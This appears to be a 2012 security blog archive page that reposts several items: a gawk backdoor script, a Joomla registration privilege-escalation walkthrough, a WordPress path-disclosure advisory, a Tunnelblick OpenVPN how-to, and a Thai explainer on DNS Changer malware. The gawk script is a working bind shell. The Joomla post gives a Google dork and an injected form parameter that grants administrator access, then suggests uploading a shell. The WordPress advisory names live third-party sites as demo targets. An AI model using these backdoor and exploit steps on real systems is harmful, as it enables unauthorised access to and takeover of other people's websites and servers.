Jul 13, 2012

MultiObfuscator 2.00

Please download this app. from Source.

MultiObfuscator is a professional cryptography tool that offers double encryption, csprng based scrambling, csprng based whitening, and more. Documentation provided.

Source: http://packetstormsecurity.org/files/114693

If you like my blog, Please Donate Me

Jul 12, 2012

A Backdoor in gawk by thegrugg

BEGIN {
     port = 8080
     prompt = "bkd> "
     
    service = "/inet/tcp/" port "/0/0"
    while(1){
           do {
                 printf prompt |& service
                 service |& getline cmd
                 if(cmd) {
                       while((cmd |& getline) > 0)
                             print $0 |& service
                       close(cmd)
                 } 
           }while(cmd!="exit")
           close(service)
    }
}

Source: https://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-prn1/s720x720/563510_496286730388794_1579364463_n.jpg

If you like my blog, Please Donate Me

Hacked Joomla! v. [1.6.x] [1.7.x] [2.5.0-2.5.2] - Escalation of Privileges

This vulnerability allows us to escalate privileges joomla for registering a new user, for 1.6.x/1.7.x versions have not been issued so far no patch versions and 1.0.x/1.5.x/2.5.3 + are not vulnerable. but for our comfort the v. 1.5.x (which is not patched) joomla has the well-known bug of the token, you can change the admin pass, well that's another topic.

Let us focus on our own and exploit this vulnerability xD! Many websites use joomla have them. The bug is creating us a new user, but before that we must add a parameter to the registration form but can use Firebug (Firefox Addon For), look good and latent potential joomla website.

Dork :: inurl :/ index.php? Option = com_users & view = registration
Exploit Code For use with Firebug :: <input value="7" name="jform[groups][]" />

Here we have a joomla site and see its source code, to maybe be able to know which version is.




I deleted the domain from that page, but can remove it by looking at the logo xD! , Well we noticed that when viewing the source code we get the META tag "Joomla - Open Source Content Management" which does not tell us which version is, but possibly that joomla is a current or almost current version, I mean by the phrase is checked, but do not guarantee that it can easily delete or change, but if you want to know that version can probably be used CMSEXPLORER program that is included in the distributions of Backtrack. Now try to create a user, we have to look the part of users to check in, write in the browser:

www.site-joomla.com/index.php?option=com_users&view=registration



As I will fill out forms with my details and apropósito erre now to write my password, I did this so that when I sent the parameter register (which then inject) to stay engraved in our recording session, and put an existing mail and in the end they send you a registration confirmation link now inject our parameter missing in the registration form in order to exploit the vulnerability happy.
Press F12 to open Firebug and then develop the steps of the image, and now we put our little code that is almost at the beginning of this post.



If they realize this code between the tags "<dd> </ dd>" is that this version of joomla use these types of labels, then maybe find a joomla without these tags, in this case have to do as its structure and attached to it, to avoid failures xD! with respect to the code, if they realize the "value = 7", that tells us that we be in the Administrators group and not the Super Users group is the value 8.


Well we press F12 or minimize the firebug that we no longer use, and do the steps in the image.


After checking in we get a message that says verify and confirm the registration in our email provided, and if not found in the area revizenlo post spam.


After confirming the registration panel administracionde accede joomla.

www.site-joomla.com/administrator and we login.



Come see in the image of the joomla version is 2.5.1, well almost now as we said in the beginning and we can also see our administrator user that is xD! Now is raise our shell.

This video demonstrate how to upload shell on our Joomla sites.

Well they have their shell on the server can do whatever they want, maybe not Rootear the server, and if maybe there is a Local Root can make symbolic links (symlink) files to other users who are on the same server or nose, and you will see.

Post-Data:

- I forgot, we can also inject the code to escalate privileges in joomla using Tamper Data (addon for firefox), you just have to add one more parameter to change when sending data.


Exploit Code for Use with Tamper Data :: jform [groups] [] = 7


then you upload a picture, to see how is the question.


- If anyone is wondering how many versions of joomla, these are, if I'm wrong someone let me know xD!.


Joomla V.
[1.0.x] - [1.5.x] - [1.6.x] - [1.7.x] - [2.5.x]

Author: pwnakil @ CL-Security

Source: http://translate.google.com/translate?hl=th&sl=auto&tl=en&u=http%3A%2F%2Fcalebbucker.blogspot.com.es%2F2012%2F07%2Fhacked-joomla-v-16x17x250-252.html


If you like my blog, Please Donate Me

Wordpress all Version full Path Disclosure Vulnerability By KinG Of PiraTeS

================================================================================
____ _    _    ____ _  _    ____ _  _ ___  ____ ____ 
|__| |    |    |__| |__|    |__| |_/  |__] |__| |__/    I Love Palestine
|  | |___ |___ |  | |  |    |  | | \_ |__] |  | |  \ 
                                                     
================================================================================
####
# Exploit Title: WordPress all Version full Path Disclosure Vulnerability
# Author: KinG Of PiraTeS
# GooGle+ : http://goo.gl/5RVFv
# Facebook Profile: www.fb.me/cr4ck3d
# Facebeook Page : www.fb.me/serial.crack
# Facebeook Page : www.fb.me/Cars2Luxe
# E-mail: t5r@hotmail.com / cr4ck3d@offdr5cax.dz
# Web Site : www.1337day.com | www.inj3ct0rs.com
# Category:: webapps
# Google Dork: intext:"powered by WordPress"
# platform : php
# Vendor: http://www.wordpress.com/
# Version: all
# Security Risk : Low ( Only for inforamtion )
# Tested on: [Windows 7 Edition Intégrale 64bit ]
####
 
==============

1)Exploit
=========

[~] P0c [~] :
============

Vuln file in :

http://Localhost/{Path}/wp-includes/registration-functions.php


[~] Vuln Code [~] :

---->

<?php

/**
 * Deprecated. No longer needed.

*
 
* @package WordPress
 
*/
_deprecated_file( basename(__FILE__), '2.1', null, __( 'This file no longer needs to be included.' ) );

?>


----->

There is no file to Call from the Function shown below


[~] D3m0 [~] :
=============


http://hotelsandhighways.com/blog/wp-includes/registration-functions.php?nulled=1337day
http://beavory.com/wp-includes/registration-functions.php?nulled=1337day
http://www.chateau-theme.com/wp-includes/registration-functions.php?nulled=1337day
 
Source: http://1337day.com/exploits/18958 



If you like my blog, Please Donate Me

Jul 11, 2012

Howto: Use openvpn config files on Mac OS X

This post will tell you how to use openvpn and openvpn config file on Mac OSX

1. Download the Tunnelblick from http://code.google.com/p/tunnelblick/

2. Open the downloaded disk image file (which mounts the disk image).

3. Double click on Tunnelblick icon to install program, after that take the step of Tunnelblick installer



4. After Install completed, copy your openvpn config files to ~/Library/Application\ Support/Tunnelblick/Configurations/


5. Restart Tunnelblick application.


6. Try to connect openvpn server with your options.




If you like my blog, Please Donate Me

Jul 9, 2012

DNS Changer ทำงานยังไงกันแน่

เป็นประเด็นค่อนข้างมากกับเรื่อง Malware ที่ชือว่า DNS Changer วันนี้ขอหยิบยกมาพูดหน่อยละกันครับ

ก่อนที่จะรู้ว่า DNS Changer ทำงานยังไง เรามาดูก่อนดีกว่าว่า DNS คืออะไรครับ

DNS คืออะไร
โดยปกติแล้วการเข้าไปใช้งานเว็บไซด์ต่างๆ จะไม่ได้ติดต่อกันด้วยชื่อของเว็บไซด์อย่าง www.facebook.com, www.google.com หรอกนะ เพราะการเชื่อมต่อเน็ตเวิร์คต่างๆทำด้วย IP Address ส่วนชื่อเว็บไซด์(domain name)นั้นเอาไว้เพื่อให้ผู้ใช้งานทั่วไปเท่านั้น แล้วทีนี้เราจะรู้ได้ยังไงล่ะว่า IP Address ปลายทางที่เราจะไปคือที่ไหนล่ะ นี่แหล่ะคือจุดที่มาของ DNS Server

DNS(Domain Name System) Server คือตัวที่เก็บข้อมูลไว้ว่า www.facebook.com เป็น IP Address อะไร หรือหากไม่รู้ก็จะไปถาม DNS ที่อื่นมาให้ ซึ่งทำให้เรารู้ว่าปลายทางของเว็บไซด์(IP Address)อยู่ที่ไหนกันแน่

Step การเข้าใช้เว็บไซด์ของเราจริงๆเป็นดังนี้
1. เรียกเข้าเว็บไซด์  www.facebook.com
2. เว็บบราวเซอร์(Firefox, IE, Chrome)ถามทาง DNS ว่าเว็บไซด์  www.facebook.com  คือ IP Address อะไร
3. DNS Server ไปค้นหาใน list ถ้าหากเจอก็จะตอบกลับไปทางเว็บบราวเซอร์ แต่หากไม่เจอก็จะไปถาม  DNS ที่อื่นให้
4. เว็บบราวเซอร์รู้ว่าจะต้องไปที่ IP Address ไหน ก็จะร้องขอหน้าเว็บจาก IP Address นั้นอีกที


ภาพประกอบจาก it24hrs.com

DNS Changer นั้นเป็น ​Trojan Horse ทีถูกพัฒนาและใช้งานมาตั้งแต่ปี 2007 ทีนี้เรามาดูต่อว่า DNS Changer ทำอะไรบ้าง
1. สิ่งแรกที่มันทำคือการเปลี่ยนที่อยู่ DNS (ตามชือครับ)ภายในเครื่องของเรา ที่เราจะไปถามว่าเว็บไซด์นี้อยู่ที่ไหน ไปเป็นเครื่อง DNS ของ Hacker แทนซึ่งการกระทำดังกล่าวเพื่อหลอกให้เหยื่อเข้าไปยังเว็บไซด์ปลอมหรือเว็บไซด์โฆษณาอื่นๆแทนที่จะเป็นเว็บไซด์จริงๆแทน
2. มันจะพยายาม Login ไปยัง Firewall, Router ที่เราเชื่อมต่ออยู่(โดยใช้ default username, password ของ Firewall, Router รุ่นนั้นๆ) แล้วเปลี่ยน DNS ภายในนั้นให้กลายเป็น DNS ของ Hacker แทน ซึ่งจุดประสงค์จะเหมือนกับข้อแรก แต่จะทำให้เครื่องอื่นๆที่ไม่ติด DNS Changer แต่ใช้งาน Firewall, Router ดังกล่าวโดนดึงไปยังเว็บไซด์ปลอมต่างๆเหมือนกับคนที่ติด DNS Changer ครับ
3. รับคำสั่งและส่งข้อมูลต่างๆจากเครื่อง botnet ของ Hacker (Command And Control Server)

ทีนี้ผลกระทบที่เกิดขึ้นมีเครื่องที่ติด DNS Changer และสร้างความเสียหายถึง 14,000,000$ ทำให้ FBI เข้ามาจัดการเรื่องนี้โดยการเข้าไปไล่ปิด botnet server อีกทั้งยังจับ Hacker ที่ใช้ประโยชน์จาก DNS Changer ที่เป็นชาวเอสโตรเนียไปอีก 6 คน และศาลยังให้สิทธิ์ทาง FBI ไล่ปิด DNS (สั่งให้ ISP ปิดการเชื่อมต่อไปยัง DNS ของ Hacker ไม่ได้ปิด server  ต่างๆใน List IP นะครับ)ทั้งหมดได้ ซึ่ง IP Range ทั้งหมดที่เป็น  DNS Changer มีดังนี้

List IP Range ที่เป็น DNS ของ Hacker
1. 64.28.176.0 - 64.28.191.255
2. 67.210.0.0 - 67.210.15.255
3. 77.67.83.0 - 77.67.83.255
4. 85.255.112.0 - 85.255.127.255
5. 93.188.160.0 - 93.188.167.255
6. 213.109.64.0 - 213.109.79.255


ซึ่ง FBI เล็งเห็นว่าหากปิด DNS ทั้งหมดจะทำให้มีผู้ใช้จำนวนมากไม่สามารถใช้งาน Internet ได้เพราะไม่รู้ว่าจะต้องไปที่ไหน ดังนั้นจึงมีการระบุไปว่าให้ผู้ใช้ทั้งหลายตรวจสอบและเคลียร์เครื่องตัวเองให้เรียบร้อยก่อนจะปิด DNS ทั้งหมดในวันที่ 09/07/2012 ทำไมเป็นวันนี้ล่ะ ก็เพราะว่าวันที่ 9 กรกฎาคมนี้เป็นวันสุดท้ายที่คำสั่งศาลจะมีผลครับ

วิธีการ Check และแก้ไข DNS Changer ออกไปจากเครื่อง
วิธีการ Check ก็มีหลายวิธีนะครับ สามารถทำได้ด้วยตัวเองง่ายๆ หรือเข้าเว็บไซด์เพื่อเช็คโดยเฉพาะ ซึ่งสรุปได้ดังนี้
1. เข้าไปที่ www.dns-ok.us หากพบว่าเป็นภาพตรวจสอบเป็นสีเขียว ก็หมายความว่าคุณไม่ติด แต่หากติดจะเป็นสีแดงครับ
ภาพจาก it24hrs.com

2. หากคุณใข้ Windows 7 ให้เข้าไปที่ Start -> Run -> พิมพ์ว่า Network and Sharing Center -> ไปที่ Network ที่คุณใช้ หากใช้ LAN ก็จะเป็น Local Area Connection แต่หากเป็น Wireless Network Connection ครับ -> Properties -> Double Click ที่ Internet Protocol Version 4(TCP/IPv4) -> หากที่ส่วน DNS Server มีการระบุไว้ว่าเป็น IP Address ใน  List ด้านบนที่เคยบอกไว้แสดงว่าเครื่องคุณติด DNS Changer ครับ
    
3. หากคุณใช้ Windows XP ให้เข้าไปที่ Start -> Control Panel -> Network And Internet Connection -> Network Connections -> เลือกที่ Network ที่คุณใช้ หากใช้ LAN ก็จะเป็น Local Area Connection แต่หากเป็น Wireless Network Connection ครับ ->  Properties -> Double Click ที่ Internet Protocol(TCP/IP) -> หากที่ส่วน DNS Server มีการระบุไว้ว่าเป็น IP Address ใน  List ด้านบนที่เคยบอกไว้แสดงว่าเครื่องคุณติด DNS Changer ครับ
4. หากคุณใช้ MAC ให้ Click ที่ Network ที่มุมขวาบน -> Open Network Preferences -> หากว่าใน Interface ใดๆก็แล้วแต่มีการ set DNS ไว้ว่าเป็น IP Address ใน List ด้านบนที่เคยบอกแสดงว่าเครื่องคุณติด DNS Changer ครับ

5. เช็คใน Firewall, Router ที่คุณใช้ด้วยว่า DNS Address มีการใช้ List IP ด้านบนหรือเปล่า ถ้าใช้ก็แสดงว่าโดนแล้วเหมือนกันครับ

วิธีการแก้ไขหากติด DNS Changer มีขั้นตอนดังนี้
1. แน่นอนคือการเอามันออกไปจากเครื่องก่อน โดยเราสามารถ download tool ที่ใช้จัดการมันโดยเฉพาะของ Avira ได้ที่ http://techblog.avira.com/2012/01/23/avira-dns-repair-tool-released/en/ หรือจากของผู้ผลิตอื่นได้จากเว็บไซด์ http://www.dcwg.org/fix/ ครับ หรือจะใช้สำหรับของ MAC ก็โหลดได้ที่ http://macscan.securemac.com/files/DNSChangerRemovalTool.dmg ครับ

2. เมื่อทำการลบแล้ว Antivirus บางตัวจะไม่ได้ทำการเปลี่ยน DNS IP Address ให้เรา เราต้องเข้าไปปรับให้มันด้วย ซึ่งวิธีการเข้าไป config ดังกล่าวจะเหมือนกับวิิธีการ Check อย่างที่บอกก่อนหน้านี้ จากนั้นให้เรา Set DNS IP รับจาก DHCP แทน(Obtain  DNS server address automatically, Using DHCP(ของ MAC))
*** อย่าลืมทำกับ Firewall, Router ด้วยนะครับ

จบแล้วครับ




Reference::
- www.dcwg.org
- nakedsecurity.sophos.com
- www.it24hrs.com










If you like my blog, Please Donate Me
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |